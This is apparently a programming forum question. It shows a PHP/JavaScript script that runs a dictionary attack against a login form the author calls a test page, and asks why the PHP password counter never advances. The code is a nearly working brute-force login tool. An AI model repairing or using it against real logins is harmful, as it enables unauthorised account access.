I have written a script that tries to hack the login of a test page with a dictionary attack. Normally the code should work, but the password list array doesn't use the increased counter variable. In line 4 the variable $filecounter_php is initialised with the value 0. And in line 41 I use this counter to get the next element from the password list array. And in line 43 I increase the counter variable.
In line 45 I call the function to check the next password if the last one was false. But in line 41 the array won't use the increased filecounter and it takes the first element (index 0) every time.
So my question is: Why doesn't the array use the increased counter variable?
Many thanks in advance for your help! :-)
1  <html>
2  <head>
3  <?php
4  $filecounter_php = 0;
5  $pw_list = file("pw_list.txt");
6  ?>
7
8  <script type="text/javascript">
9
10 var filecounter_js = 0;
11 var filesize = 187428;
12 var password = "1337";
13
14 function dic_attack()
15 {
16     if (window.XMLHttpRequest)
17     {
18         var http = new XMLHttpRequest();
19         var b = document.getElementById("bdy");
20         var url = "index.php";
21         var params = params = "username=user123&password="+password;
22         http.open("POST", url, true);
23         //Send the proper header information along with the request
24         http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
25         //http.setRequestHeader("Content-length", params.length);
26         //http.setRequestHeader("Connection", "close");
27
28         http.onreadystatechange = function()
29         {//Call a function when the state changes.
30             if(http.readyState == 4 && http.status == 200)
31             {
32                 var response = http.responseText;
33                 if (response.search('SUCCESS') != -1)
34                 {
35                     b.innerHTML=http.responseText;
36                 }
37                 else
38                 {
39                     if (filecounter_js < filesize)
40                     {
41                         password = <?php echo "\"".trim(preg_replace('/\s\s+/', ' ', $pw_list[$filecounter_php]))."\""; ?>;
42                         b.innerHTML+="Trying: " + password + "..."+"<br>";
43                         <?php $filecounter_php = $filecounter_php + 1; ?>
44                         filecounter_js = filecounter_js + 1;
45                         dic_attack();
46                     }
47                     else
48                     {
49                         b = document.getElementById("bdy");
50                         b.innerHTML+="Couldn´t crack account!"+"<br>";
51                     }
52                 }
53             }
54         }
55         http.send(params);
56     }
57 }
58 </script>
59 </head>
60 <body id="bdy">
61 <?php echo "<script type=\"text/javascript\">dic_attack();</script>"; ?>
62 </body>
63 </html>